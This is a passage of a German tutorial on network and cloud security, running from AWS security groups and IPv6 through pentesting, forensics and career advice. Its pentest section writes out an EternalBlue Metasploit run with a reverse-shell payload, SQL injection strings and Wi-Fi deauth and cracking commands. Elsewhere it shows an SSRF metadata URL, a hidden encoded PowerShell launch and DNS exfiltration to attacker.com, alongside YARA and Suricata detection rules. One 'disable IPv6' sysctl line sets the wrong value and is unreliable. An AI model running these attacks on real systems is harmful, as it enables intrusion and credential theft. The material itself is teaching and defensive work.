Security Groups vs NACLs (AWS Beispiel):

1. Security Groups:

• Stateful (Return-Traffic automatisch erlaubt)
• Auf Instance-Ebene
• Nur Allow-Regeln

# Beispiel: Web-Server Security Group
Inbound:
  - HTTP (80) von 0.0.0.0/0
  - HTTPS (443) von 0.0.0.0/0
  - SSH (22) von Admin-IP

Outbound:
  - Alles erlaubt (Standard)

2. NACLs (Network ACLs):

• Stateless (Return-Traffic muss explizit erlaubt werden)
• Auf Subnet-Ebene
• Allow und Deny-Regeln

Cloud-spezifische Angriffe:

1. SSRF (Server-Side Request Forgery):

# Angreifer nutzt Web-App, um Metadaten-Service abzufragen
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Kann zu Credentials-Leak führen

Schutz:

• IMDSv2 verwenden (AWS)
• Firewall-Regeln für Metadata-Service

2. S3 Bucket Misconfigurations:

• Öffentlich lesbare Buckets
• Zu permissive IAM-Policies

Best Practices:

# Bucket Policy: Nur HTTPS
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Deny",
    "Principal": "*",
    "Action": "s3:*",
    "Resource": "arn:aws:s3:::mybucket/*",
    "Condition": {
      "Bool": {"aws:SecureTransport": "false"}
    }
  }]
}

---

9. IPv6 – Die Zukunft (und Gegenwart)

Warum IPv6:

• IPv4: 4,3 Milliarden Adressen (erschöpft)
• IPv6: 340 Sextillionen Adressen

IPv6-Adressformat:

2001:0db8:85a3:0000:0000:8a2e:0370:7334

# Kurzschreibweise:
2001:db8:85a3::8a2e:370:7334

# Loopback
::1

# Link-Local (wie APIPA bei IPv4)
fe80::1

IPv6-Adresstypen:

1. Global Unicast: 2000::/3
   • Routbar im Internet
2. Link-Local: fe80::/10
   • Nur im lokalen Segment
3. Unique Local: fc00::/7
   • Wie private IPs bei IPv4

Wichtige Unterschiede zu IPv4:

• Kein NAT nötig: Jedes Gerät hat globale IP
• Kein Broadcast: Stattdessen Multicast
• SLAAC: Automatische Konfiguration ohne DHCP
• IPsec: Eingebaut (aber optional)

IPv6-Sicherheit:

Vorteile:

• IPsec-Unterstützung eingebaut
• Kein NAT = Ende-zu-Ende-Verschlüsselung einfacher

Neue Risiken:

1. NDP (Neighbor Discovery Protocol) Attacks:

# Ähnlich wie ARP-Spoofing
# Router Advertisement Spoofing
# Neighbor Advertisement Spoofing

2. Riesiger Adressraum:

• Netzwerk-Scanning schwieriger (gut!)
• Aber: Discovery über Multicast möglich

3. Tunneling-Protokolle:

# 6to4, Teredo, etc.
# Können Firewall-Regeln umgehen

Schutz:

# RA Guard auf Switches
Switch(config-if)# ipv6 nd raguard

# Disable unused transition mechanisms
sysctl -w net.ipv6.conf.all.disable_ipv6=0

Dual Stack:

• Gleichzeitiges Betreiben von IPv4 und IPv6
• Standard-Ansatz während Übergangszeit

---

10. Netzwerk-Automatisierung und SDN

Software-Defined Networking (SDN)

Konzept:

• Trennung von Control Plane und Data Plane
• Zentrale Controller-Software
• Programmierbare Netzwerke

Vorteile:

• Zentrale Verwaltung
• Dynamische Anpassung
• Automatisierung

Protokolle:

1. OpenFlow:

Controller gibt Switches Flow-Regeln:
"Alle Pakete von IP 10.0.0.1 zu Port 2 weiterleiten"

2. NETCONF/YANG:

• Standardisierte Netzwerk-Konfiguration
• APIs statt CLI

Network Automation Tools:

1. Ansible:

---
- name: Configure VLAN on switches
  hosts: switches
  tasks:
    - name: Create VLAN 10
      ios_vlan:
        vlan_id: 10
        name: Mitarbeiter
        state: present

2. Python mit Netmiko:

from netmiko import ConnectHandler

device = {
    'device_type': 'cisco_ios',
    'ip': '192.168.1.1',
    'username': 'admin',
    'password': 'password',
}

connection = ConnectHandler(**device)
output = connection.send_command('show ip interface brief')
print(output)
connection.disconnect()

3. Terraform (Infrastructure as Code):

resource "aws_vpc" "main" {
  cidr_block = "10.0.0.0/16"
  
  tags = {
    Name = "main-vpc"
  }
}

resource "aws_subnet" "public" {
  vpc_id     = aws_vpc.main.id
  cidr_block = "10.0.1.0/24"
}

---

11. Monitoring und Troubleshooting-Methodik

Systematisches Troubleshooting

OSI-Modell von unten nach oben:

Layer 1 Problem:

Symptom: Kein Link
✓ Kabel eingesteckt?
✓ Link-LED leuchtet?
✓ Kabel beschädigt?
✓ Port aktiviert? (no shutdown)

Layer 2 Problem:

Symptom: Kann Geräte im gleichen Netz nicht erreichen
✓ Switch funktioniert?
✓ Richtiges VLAN?
✓ Port-Security blockiert?
✓ MAC-Adresse gelernt? (show mac address-table)

Layer 3 Problem:

Symptom: Kann Router nicht pingen
✓ IP-Konfiguration korrekt?
  - IP-Adresse: ip addr show (Linux) / ipconfig (Windows)
  - Gateway: ip route show / route print
✓ Subnetzmaske richtig?
✓ Gateway erreichbar? ping <gateway>
✓ Firewall blockiert ICMP?

Layer 4+ Problem:

Symptom: Webseite lädt nicht
✓ DNS funktioniert? nslookup domain.com
✓ Port offen? telnet domain.com 80
✓ Service läuft? netstat -tulpn | grep 80
✓ Firewall-Regeln? iptables -L -n
✓ TLS-Zertifikat gültig?

Praktisches Beispiel:

# Komplette Diagnosekette
ping 8.8.8.8           # Internet erreichbar?
ping google.com        # DNS funktioniert?
traceroute google.com  # Wo stoppt es?
nslookup google.com    # DNS-Details
dig google.com         # Erweiterte DNS-Info
curl -v https://google.com  # HTTP-Verbindung testen

---

Log-Analyse

Wichtige Logs:

1. Firewall-Logs:

# Linux (iptables)
tail -f /var/log/kern.log | grep DROPPED

# Suche nach:
- Viele blockierte Verbindungen von einer IP (Scan?)
- Ungewöhnliche Ziel-Ports
- Verbindungen zu ungewöhnlichen Zeiten

2. Auth-Logs:

# Failed SSH logins
grep "Failed password" /var/log/auth.log

# Erfolgreiche Logins
grep "Accepted password" /var/log/auth.log

3. Web-Server-Logs:

# Apache/Nginx Access Log
tail -f /var/log/nginx/access.log

# Suche nach:
- 404-Fehler (Scanner?)
- SQL-Injection-Versuche (' OR 1=1)
- Path Traversal (../)
- Ungewöhnlich viele Requests von einer IP

Log-Aggregation mit ELK-Stack:

Elasticsearch: Speichert Logs
Logstash: Sammelt und transformiert Logs
Kibana: Visualisierung

---

12. Compliance und Best Practices

Frameworks und Standards:

1. CIS Benchmarks:

• Konfigurationsleitfäden für sichere Systeme
• Für Router, Switches, Server, Cloud

2. NIST Cybersecurity Framework:

• Identify, Protect, Detect, Respond, Recover

3. ISO 27001:

• Informationssicherheits-Managementsystem

Härtung (Hardening) Checkliste:

Router/Switch:

✓ Default-Credentials ändern
✓ Starke Passwörter (min. 16 Zeichen)
✓ SSH statt Telnet
✓ Nicht benötigte Services deaktivieren
✓ SNMP v3 (wenn benötigt)
✓ Logging aktivieren
✓ NTP konfigurieren (wichtig für Logs)
✓ Banner setzen (rechtliche Warnung)
✓ Zugriff auf Management nur aus Management-VLAN
✓ Regelmäßige Firmware-Updates
✓ Config-Backups automatisieren

Firewall:

✓ Default Deny Policy
✓ Least Privilege
✓ Logging für alle Regeln
✓ Regelmäßiges Review der Regeln
✓ Dokumentation jeder Regel
✓ Rate Limiting
✓ Geo-Blocking (wenn sinnvoll)
✓ Anti-Spoofing (RFC 1918, Bogons)

Wireless:

✓ WPA3 (oder min. WPA2)
✓ Starkes Passwort (20+ Zeichen)
✓ 802.1X für Enterprise
✓ Separates Gäste-WLAN
✓ WIDS aktiviert
✓ Rogue AP Detection
✓ Client-Isolation

---

13. Penetration Testing – Ethisches Hacking

WICHTIG: Nur im eigenen Netzwerk oder mit schriftlicher Erlaubnis!

Reconnaissance Phase:

1. Passive Reconnaissance:

# WHOIS-Lookup
whois domain.com

# DNS-Enumeration
dig domain.com ANY
dig @8.8.8.8 domain.com

# Subdomain-Enumeration
sublist3r -d domain.com

# Google Dorking
site:domain.com filetype:pdf
site:domain.com inurl:admin

2. Active Reconnaissance:

# Nmap-Scan (Stealth)
nmap -sS -T2 -f target.com

# Full Port Scan
nmap -p- -T4 -A target.com

# UDP-Scan (langsam!)
nmap -sU -T4 target.com

# NSE Scripts
nmap --script vuln target.com

Exploitation (Beispiele):

1. Metasploit Framework:

msfconsole

# Suche nach Exploit
search ms17-010

# Nutze Exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
exploit

2. SQL-Injection (manuell):

# Teste auf Anfälligkeit
' OR '1'='1

# Union-based
' UNION SELECT NULL, NULL, NULL--

# Datenbank-Version
' UNION SELECT NULL, @@version--

# Tabellen auslesen
' UNION SELECT table_name, NULL FROM information_schema.tables--

3. Wireless Hacking:

# Interface in Monitor-Mode
airmon-ng start wlan0

# Scan nach Netzwerken
airodump-ng wlan0mon

# Capture Handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Deauth um Handshake zu erzwingen
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

# Crack mit Wordlist
aircrack-ng -w wordlist.txt capture-01.cap

Post-Exploitation:

Persistence:

• Backdoors einrichten
• Scheduled Tasks
• Startup-Scripts

Lateral Movement:

• Netzwerk nach weiteren Zielen scannen
• Credentials harvesting
• Pass-the-Hash

Data Exfiltration:

• Daten komprimieren und verschlüsseln
• Über legitime Kanäle (HTTPS, DNS) exfiltrieren

---

14. Incident Response

Bei Sicherheitsvorfall:

Phase 1: Preparation

• Incident Response Plan vorhanden?
• Team definiert?
• Tools bereit?

Phase 2: Detection & Analysis

Anzeichen eines Vorfalls:
- Ungewöhnlicher Netzwerk-Traffic
- Viele fehlgeschlagene Logins
- Neue unbekannte Geräte im Netz
- Performance-Probleme
- Alarme von IDS/IPS

Phase 3: Containment

Sofortmaßnahmen:
✓ Betroffene Systeme isolieren (nicht ausschalten!)
✓ Passwörter ändern
✓ Firewall-Regeln verschärfen
✓ Betroffene Accounts deaktivieren

Phase 4: Eradication

✓ Malware entfernen
✓ Backdoors schließen
✓ Vulnerabilities patchen
✓ Systeme neu aufsetzen (wenn nötig)

Phase 5: Recovery

✓ Systeme aus Backup wiederherstellen
✓ Schrittweise wieder online bringen
✓ Intensives Monitoring

Phase 6: Lessons Learned

✓ Dokumentation des Vorfalls
✓ Was lief gut/schlecht?
✓ Prozesse verbessern
✓ Mitarbeiter schulen

---

15. Praktisches Heimlabor aufbauen

Minimale Ausstattung:

Hardware:
- Alter PC/Laptop (für virtuelle Maschinen)
- Raspberry Pi (für Pi-hole, VPN-Server)
- Managed Switch (gebraucht ab 50€)
- Optional: Alter Router zum Experimentieren

Software:
- VirtualBox/VMware (kostenlos)
- GNS3 (Netzwerk-Simulation)
- Kali Linux
- pfSense
- Ubuntu Server

Lab-Szenarien zum Üben:

Szenario 1: Multi-VLAN-Netzwerk

Aufbau:
- 1 Router (virtuell oder physisch)
- 1 Managed Switch
- 3 VLANs: Management, Clients, Server

Aufgaben:
✓ VLANs konfigurieren
✓ Inter-VLAN-Routing einrichten
✓ DHCP für jedes VLAN
✓ Firewall-Regeln zwischen VLANs
✓ Port-Security aktivieren
✓ Traffic mit Wireshark analysieren

Szenario 2: pfSense Firewall Lab

Setup:
- pfSense VM (2 NICs: WAN, LAN)
- Mehrere Client-VMs dahinter
- Angriffs-VM (Kali Linux) außerhalb

Übungen:
✓ Firewall-Regeln erstellen
✓ NAT konfigurieren
✓ Port-Forwarding für Webserver
✓ VPN-Server (OpenVPN/WireGuard)
✓ IDS/IPS (Suricata/Snort)
✓ Traffic-Shaping (QoS)
✓ Angriffe simulieren und blockieren

Szenario 3: Wireless Security Lab

Hardware:
- Alter Router mit DD-WRT/OpenWrt
- USB-WLAN-Adapter (Monitor-Mode fähig)
- Raspberry Pi als Access Point

Übungen:
✓ WPA2-Enterprise mit RADIUS
✓ Captive Portal für Gäste
✓ Handshake capture
✓ Evil Twin Attack (ethical!)
✓ Deauth-Angriffe erkennen
✓ WIDS aufsetzen

Szenario 4: Blue Team vs Red Team

Setup:
- Vulnerable VM (Metasploitable, DVWA)
- Monitoring-System (Wazuh/ELK)
- Attacker-Machine (Kali)

Blue Team Aufgaben:
✓ Monitoring aufsetzen
✓ Logs analysieren
✓ Intrusion Detection
✓ Incident Response üben

Red Team Aufgaben:
✓ Reconnaissance
✓ Vulnerability Scanning
✓ Exploitation
✓ Post-Exploitation

---

16. Erweiterte Angriffstechniken (Defense-Perspektive)

Layer 2 Attacks im Detail:

1. VLAN Hopping – Double Tagging:

Funktionsweise:
1. Angreifer in VLAN 10
2. Erstellt Paket mit 2 VLAN-Tags:
   [Ethernet][VLAN 10][VLAN 20][IP][Data]
3. Switch entfernt ersten Tag (VLAN 10)
4. Zweiter Switch sieht nur VLAN 20-Tag
5. Paket landet in VLAN 20

Verteidigung:
Switch(config)# interface GigabitEthernet0/1
Switch(config-if)# switchport mode access
Switch(config-if)# switchport access vlan 10
Switch(config-if)# switchport nonegotiate
# Native VLAN ändern auf ungenutztes VLAN
Switch(config)# vlan 999
Switch(config-vlan)# name unused
Switch(config)# interface GigabitEthernet0/24
Switch(config-if)# switchport trunk native vlan 999

2. STP (Spanning Tree Protocol) Attacks:

Angriff:
- Angreifer sendet BPDU-Pakete (Bridge Protocol Data Units)
- Gibt sich als Root Bridge aus (niedrigste Priority)
- Switch-Topologie verändert sich
- Angreifer wird zum Root → MITM-Position

Verteidigung:
Switch(config)# spanning-tree portfast bpduguard default
Switch(config)# interface range FastEthernet0/1-24
Switch(config-if-range)# spanning-tree bpduguard enable
Switch(config-if-range)# spanning-tree portfast

# Root Guard auf Uplink-Ports
Switch(config)# interface GigabitEthernet0/1
Switch(config-if)# spanning-tree guard root

3. DHCP Starvation & Rogue DHCP:

DHCP Starvation:
- Angreifer requestet alle verfügbaren IP-Adressen
- Legitime Clients bekommen keine IP mehr
- Denial of Service

Rogue DHCP Server:
- Angreifer startet eigenen DHCP-Server
- Verteilt IPs mit falschem Gateway (sich selbst)
- MITM erreicht

Verteidigung:
Switch(config)# ip dhcp snooping
Switch(config)# ip dhcp snooping vlan 10,20,30

# Trusted Ports (wo legitimer DHCP-Server hängt)
Switch(config)# interface GigabitEthernet0/1
Switch(config-if)# ip dhcp snooping trust

# Alle anderen Ports sind untrusted
Switch(config)# interface range FastEthernet0/1-24
Switch(config-if-range)# ip dhcp snooping limit rate 10

---

Advanced Persistent Threats (APT) Taktiken:

1. Living off the Land:

Konzept: Nutzung legitimer System-Tools
- PowerShell für Command & Control
- WMI für Lateral Movement
- PsExec für Remote Execution

Beispiel PowerShell-Download:
powershell -w hidden -enc <base64>

Verteidigung:
✓ PowerShell Logging aktivieren
✓ Constrained Language Mode
✓ Application Whitelisting
✓ EDR-Lösungen (Endpoint Detection & Response)
✓ Verhaltensbasierte Analyse

2. DNS Tunneling:

Technik:
- Daten in DNS-Queries verstecken
- Umgeht oft Firewalls (Port 53 meist offen)

Beispiel:
secretdata123.attacker.com
moredata456.attacker.com

Angreifer-Server antwortet mit TXT-Records

Verteidigung:
✓ DNS-Query-Monitoring
✓ Anomalie-Erkennung (zu viele/lange DNS-Queries)
✓ DNS-Firewall
✓ Whitelist für DNS-Server
✓ Analyse von Query-Längen und -Häufigkeit

Beispiel-Regel (Suricata):
alert dns any any -> any any (msg:"Possible DNS Tunneling"; 
dns_query; content:"."; depth:50; pcre:"/.{50,}/"; 
threshold:type limit, track by_src, count 1, seconds 60; 
sid:1000010;)

3. C2 (Command & Control) Channels:

Moderne C2-Techniken:
- Domain Fronting (via CDN)
- HTTPS mit gültigem Zertifikat
- Verschlüsselter Traffic in normalem HTTPS
- Timing-basierte Kommunikation (langsam, unauffällig)

Verteidigung:
✓ TLS-Inspection (bei unternehmenskritischen Daten)
✓ Netflow-Analyse (ungewöhnliche Verbindungsmuster)
✓ Beacon-Detection (regelmäßige Verbindungen)
✓ Threat Intelligence Feeds
✓ SIEM-Korrelation

Beacon-Detection mit Zeek (früher Bro):
@load base/protocols/http
event http_request(c: connection, method: string, 
                   original_URI: string, ...) {
    # Erkenne regelmäßige Verbindungen zum selben Host
    # Alle 60 Sekunden = verdächtig
}

---

17. Container und Microservices Networking

Docker Networking:

Network Modi:

1. Bridge (Standard):

# Erstellt isoliertes Netzwerk
docker network create my-network

# Container starten
docker run -d --name webserver --network my-network nginx

# Container können sich per Namen erreichen
docker exec -it another-container ping webserver

2. Host:

# Container nutzt Host-Netzwerk direkt
docker run -d --network host nginx
# Nginx hört direkt auf Host-Port 80

3. Overlay (Swarm/Kubernetes):

# Multi-Host Networking
docker network create -d overlay my-overlay

Docker Security:

# Nicht als Root laufen
USER nonroot

# Limitiere Capabilities
docker run --cap-drop ALL --cap-add NET_BIND_SERVICE nginx

# Read-only Filesystem
docker run --read-only nginx

# Network Policies
docker run --network none secure-container

Kubernetes Networking:

Konzepte:

1. Pod-to-Pod Communication:

# Jeder Pod hat eigene IP
# Alle Pods können direkt kommunizieren (flat network)

2. Services:

apiVersion: v1
kind: Service
metadata:
  name: my-service
spec:
  selector:
    app: MyApp
  ports:
    - protocol: TCP
      port: 80
      targetPort: 9376
  type: ClusterIP  # Nur intern erreichbar

3. Ingress:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: my-ingress
spec:
  rules:
  - host: myapp.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: my-service
            port:
              number: 80

Network Policies (Security):

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-all
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-from-frontend
spec:
  podSelector:
    matchLabels:
      app: backend
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080

Service Mesh (Istio):

Funktionen:
✓ mTLS zwischen allen Services
✓ Traffic-Management
✓ Observability (Distributed Tracing)
✓ Circuit Breaking
✓ Rate Limiting

Sicherheit:
- Zero-Trust Networking
- Automatische Certificate Rotation
- Fine-grained Access Control

---

18. IoT und OT (Operational Technology) Security

Besondere Herausforderungen:

IoT-Geräte:

Probleme:
- Oft keine Updates
- Schwache Default-Passwörter
- Unverschlüsselte Kommunikation
- Unnötige offene Ports
- Backdoors

Beispiele:
- Smart-TVs
- IP-Kameras
- Smart-Home-Geräte
- Wearables

Mirai-Botnet-Angriff (2016):

Ablauf:
1. Scannen nach Telnet-Ports (23, 2323)
2. Login mit Default-Credentials
3. Infektion mit Malware
4. Massive DDoS-Angriffe

Betroffene Geräte:
- IP-Kameras
- DVRs
- Router

Schutz:
✓ Default-Passwörter SOFORT ändern
✓ Telnet deaktivieren
✓ Firmware-Updates
✓ Separate IoT-VLAN
✓ Outbound-Firewall-Regeln

IoT-Netzwerk-Segmentierung:

Architektur:

Internet
    ↓
Firewall
    ↓
    ├─> Management VLAN (Admin-Zugriff)
    ├─> Corporate VLAN (Arbeitsplätze)
    ├─> Server VLAN
    └─> IoT VLAN (STRENG isoliert)
            ↓
        ├─> IP-Kameras (dürfen nur zu NVR)
        ├─> Smart-TVs (nur Internet)
        ├─> Drucker (nur zu Print-Server)
        └─> Sensoren (nur zu Data-Collector)

Regeln:
- IoT → Corporate: DENY ALL
- IoT → Server: Nur spezifische Ports
- IoT → Internet: Whitelisted Domains

OT/ICS Security (Industrial Control Systems):

Kritische Infrastruktur:
- SCADA (Supervisory Control and Data Acquisition)
- PLCs (Programmable Logic Controllers)
- HMIs (Human-Machine Interfaces)

Besonderheiten:
- 24/7 Betrieb (keine Wartungsfenster)
- Legacy-Systeme (Windows XP, ungepatchte OS)
- Physische Schäden bei Fehlfunktion möglich

Berühmte Angriffe:
- Stuxnet (2010): Iran Nuklear-Anlage
- Ukraine Power Grid (2015): Blackout

Purdue-Modell (ICS-Segmentierung):
Level 0: Physischer Prozess
Level 1: Intelligent Devices (PLCs)
Level 2: Control Systems (HMI, SCADA)
Level 3: Manufacturing Operations
--- DMZ ---
Level 4: Business Logistics
Level 5: Enterprise Network

Schutz:
✓ Air-Gap (physische Trennung) wenn möglich
✓ Unidirectional Gateways
✓ OT-spezifische Firewalls
✓ Anomalie-Erkennung
✓ Whitelist-based Access Control
✓ Offline-Backups

---

19. Zero Trust Architecture

Konzept:

„Never Trust, Always Verify“

Traditionell: "Castle and Moat"
- Perimeter-Security (Firewall)
- Innerhalb vertraut

Zero Trust:
- Kein implizites Vertrauen
- Jeder Zugriff wird verifiziert
- Least Privilege
- Micro-Segmentation

Prinzipien:

1. Verify Explicitly:

- Multi-Faktor-Authentifizierung
- Gerätezustand prüfen
- Benutzer-/Geräte-Identity
- Verhaltensanalyse

2. Least Privilege Access:

- Just-in-Time Access
- Just-Enough-Access
- Risk-based Adaptive Policies

3. Assume Breach:

- Lateral Movement verhindern
- End-to-End Encryption
- Analytics für Threat Detection
- Automatisierte Response

Implementierung:

Komponenten:

1. Identity Provider (IdP):
   - Azure AD, Okta, etc.
   - Single Sign-On
   - MFA

2. Device Trust:
   - MDM (Mobile Device Management)
   - Endpoint Protection
   - Compliance-Checks

3. Network Access Control:
   - Software-Defined Perimeter
   - VPN-less Access
   - Micro-Segmentation

4. Application Access:
   - Reverse Proxy
   - Cloud Access Security Broker (CASB)
   - API Gateways

5. Data Protection:
   - DLP (Data Loss Prevention)
   - Encryption at Rest/Transit
   - Information Rights Management

Praktisches Beispiel (BeyondCorp-Modell):

Traditionell:
Mitarbeiter → VPN → Intranet → Anwendung

Zero Trust:
Mitarbeiter → Identity Proxy → 
    ↓
Prüfungen:
- Wer? (User-Identity, MFA)
- Was? (Device-Compliance)
- Wo? (Location)
- Wie? (Verschlüsselung, Patch-Level)
    ↓
Access Decision → Anwendung

Jede Verbindung wird individuell bewertet
Kein "Zugang zum Netzwerk", nur zu spezifischen Ressourcen

---

20. Threat Hunting und Forensics

Proaktive Threat Hunting:

Hypothesis-Driven Hunting:

1. Hypothese bilden:
   "Angreifer könnten PowerShell für C2 nutzen"

2. Daten sammeln:
   - PowerShell Logs
   - Network Connections von PowerShell-Prozessen
   - Command-Line Arguments

3. Analyse:
   Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
   Where-Object {$_.Message -like "*DownloadString*"}

4. Korrelieren:
   - Ungewöhnliche externe Verbindungen?
   - Base64-encodierte Commands?
   - Ausführung außerhalb Arbeitszeiten?

5. Validieren:
   - Falsch-Positive ausschließen
   - Kontext prüfen

6. Reagieren:
   - Incident Response bei Fund
   - Detection-Rule erstellen

IOC (Indicators of Compromise) Hunting:

Suche nach bekannten IOCs:
- IP-Adressen
- Domains
- Datei-Hashes
- Registry-Keys
- Mutex-Namen

Tools:
- YARA-Rules
- OpenIOC
- STIX/TAXII (Threat Intelligence Sharing)

Beispiel YARA-Rule:
rule Suspicious_PowerShell {
    strings:
        $a = "DownloadString" nocase
        $b = "IEX(" nocase
        $c = "Invoke-Expression" nocase
        $d = "-enc" nocase
    condition:
        2 of them
}

Network Forensics:

Bei Kompromittierung:

1. Evidence Preservation:

# RAM-Dump (Volatil!)
dd if=/dev/mem of=/mnt/usb/memdump.img

# Disk-Image
dd if=/dev/sda of=/mnt/external/disk.img bs=4M conv=noerror,sync

# Network Capture
tcpdump -i eth0 -w /mnt/usb/capture.pcap

# Log-Sicherung
tar -czf logs_$(date +%Y%m%d_%H%M%S).tar.gz /var/log/

2. Timeline-Analyse:

# Wann wurde welche Datei geändert?
find / -type f -mtime -7 -ls > recent_changes.txt

# Login-Historie
last -f /var/log/wtmp

# Command-Historie
cat ~/.bash_history

3. Network-Artefakte:

# Aktive Verbindungen (vor Isolation!)
netstat -antp > connections.txt

# ARP-Cache
arp -a > arp_cache.txt

# Routing-Table
route -n > routes.txt

# Firewall-Regeln
iptables-save > firewall_rules.txt

4. Wireshark-Analyse:

Filter für verdächtige Aktivität:

# Data Exfiltration (große Uploads)
tcp.len > 1400 and ip.dst != 192.168.0.0/16

# Port-Scanning
tcp.flags.syn == 1 and tcp.flags.ack == 0

# DNS-Tunneling
dns.qry.name.len > 50

# Unverschlüsselter Login
http.request.method == "POST" and http contains "password"

# SMB-Enumeration
smb2.cmd == 3

# Follow TCP-Stream für Details

5. Memory Forensics (Volatility):

# Prozesse analysieren
volatility -f memdump.img --profile=Win10x64 pslist

# Netzwerkverbindungen
volatility -f memdump.img --profile=Win10x64 netscan

# DLLs eines Prozesses
volatility -f memdump.img --profile=Win10x64 dlllist -p 1234

# Command-Lines
volatility -f memdump.img --profile=Win10x64 cmdline

# Versteckte Prozesse
volatility -f memdump.img --profile=Win10x64 psxview

---

21. Emerging Technologies und Trends

5G Networks:

Besonderheiten:

Vorteile:
- Ultra-low Latency (<1ms)
- Massive IoT-Unterstützung
- Network Slicing

Security-Implikationen:
- Größere Angriffsfläche
- Mehr verbundene Geräte
- Edge Computing (Data closer to users)

Neue Bedrohungen:
- MitM bei "falschen" 5G-Stationen
- IoT-Botnetze (noch mehr Geräte)
- Supply Chain (Huawei-Diskussion)

SD-WAN (Software-Defined WAN):

Konzept:

Traditionell: MPLS (teuer, statisch)

SD-WAN:
- Software-gesteuert
- Mehrere Verbindungen (Internet, LTE, MPLS)
- Intelligentes Routing
- Zero-Touch Provisioning

Vorteile:
✓ Kosteneinsparung
✓ Flexible Bandbreite
✓ Application-aware Routing
✓ Zentrale Verwaltung

Security:
- Verschlüsselung aller Verbindungen
- Integrated Firewall
- Segmentation
- Cloud Security Integration

SASE (Secure Access Service Edge):

Konvergenz von Networking und Security:

Komponenten:
- SD-WAN
- CASB (Cloud Access Security Broker)
- FWaaS (Firewall as a Service)
- ZTNA (Zero Trust Network Access)
- SWG (Secure Web Gateway)

Prinzip:
Alle Security-Funktionen in der Cloud
User verbindet zu nächstem PoP (Point of Presence)
Security-Policies folgen dem User

Vorteil:
- Kein Hairpinning (Traffic via Datacenter)
- Konsistente Security überall
- Skalierbar

Quantum-Safe Cryptography:

Bedrohung durch Quantencomputer:

Problem:
- Quantencomputer können RSA/ECC brechen
- "Harvest Now, Decrypt Later" Angriffe

Lösung: Post-Quantum Cryptography
- NIST standardisiert neue Algorithmen
- CRYSTALS-Kyber (Key Encapsulation)
- CRYSTALS-Dilithium (Digital Signatures)

Vorbereitung:
✓ Crypto-Agility (einfacher Algorithmus-Wechsel)
✓ Hybrid-Ansätze (klassisch + PQC)
✓ Inventarisierung kryptografischer Assets

---

22. Karriere-Tipps und Soft Skills

Technische Skills vs Soft Skills:

Was Arbeitgeber suchen:

Technisch (60%):
- Troubleshooting-Fähigkeiten
- Hands-on Erfahrung
- Certifications (nice to have)
- Verständnis von Konzepten

Soft Skills (40%):
- Kommunikation (Nicht-Techniker erklären können)
- Dokumentation
- Teamwork
- Problem-Solving
- Lernbereitschaft

Dokumentation-Best-Practices:

Network Documentation Template:

# Netzwerk-Dokumentation Firma XYZ

## Übersicht
- IP-Adress-Schema
- VLAN-Übersicht
- Routing-Protokolle

## Topologie
[Diagramm einfügen]

## Geräte-Inventar
| Gerät | IP | Funktion | Zugangsdaten (verschlüsselt) |
|-------|----|-----------|-----------------------------|
| FW-01 | ... | ... | ... |

## Standard-Konfigurationen
### Switch-Basis-Config

[Code-Block]

### Firewall-Regeln
| Regel | Quelle | Ziel | Port | Action | Begründung |
|-------|--------|------|------|--------|------------|

## Troubleshooting-Runbooks
### Problem: Keine Internet-Verbindung
1. Check Layer 1...
2. Check Layer 2...
[...]

## Change-Log
| Datum | Änderung | Durchgeführt von |
|-------|----------|------------------|

Effektive Kommunikation:

Mit Management sprechen:

FALSCH:
"Der SYN-Flood-Angriff hat unsere Stateful-Inspection-Firewall
überlastet und die Connection-Table ist voll gelaufen."

RICHTIG:
"Wir hatten einen Angriff, bei dem unser Netzwerk mit
Anfragen überflutet wurde. Das System konnte nicht alle
gleichzeitig bearbeiten. Wir haben das Problem behoben,
indem wir eine Obergrenze für Anfragen eingerichtet haben.
Kosten: 0€, Downtime: 15 Minuten."

Management interessiert:
- Business-Impact
- Kosten
- Risiken
- Timeline

Continous Learning:

Lernstrategie:

1. Fundamentals zuerst (OSI, TCP/IP)
2. Hands-on Praxis (Lab!)
3. Spezialisierung (Cloud, Security, etc.)
4. Community (Reddit, Discord, Foren)
5. Teach others (bester Weg zu lernen)

Ressourcen:
- networking, netsec
- NetworkChuck (YouTube)
- Professor Messer (YouTube)
- Cisco Learning Network
- GNS3 Academy
- Hack The Box / TryHackMe

---

24. Abschluss: Wichtigste Takeaways

Core-Prinzipien die du IMMER beachten solltest:

1. Defense in Depth:

Nie auf eine einzige Sicherheitsmaßnahme vertrauen
Mehrere Schichten = höhere Sicherheit

2. Least Privilege:

Minimale notwendige Rechte
Gilt für User UND Netzwerk-Traffic

3. Fail Secure:

Bei Fehler: Lieber zu restriktiv als zu offen
Firewall kaputt? → Block all

4. Keep It Simple:

Komplexität = Fehlerquelle
Einfache Lösungen sind oft besser
Dokumentier es so, dass andere es verstehen

5. Monitoring ist Pflicht:

Was du nicht siehst, kannst du nicht schützen
Logs sind Gold wert
SIEM für Korrelation

6. Patch Management:

Ungepatchte Systeme = #1 Eintrittspunkt
Regelmäßige Updates
Test before Production

7. Assume Breach:

Frage nicht OB, sondern WANN
Incident Response Plan vorbereiten
Regelmäßige Drills

Wichtige Mindset-Shifts:

1. Es ist OK, nicht alles zu wissen
   → Google ist dein Freund
   → Documentation lesen ist eine Skill

2. Fehler sind Lern-Opportunitäten
   → Breaking Things in Labs ist gut
   → Production ist anders (Vorsicht!)

3. Security ist ein Prozess, kein Zustand
   → Nie "fertig"
   → Kontinuierliche Verbesserung

4. Praktische Erfahrung > Zertifikate
   → Labs, Labs, Labs
   → Zertifikate öffnen Türen, Skills halten Job

---

Schlusswort:

Netzwerktechnik ist ein enorm breites Feld. Was ich dir hier gegeben habe, ist eine solide Grundlage, aber es gibt noch so viel mehr zu lernen:

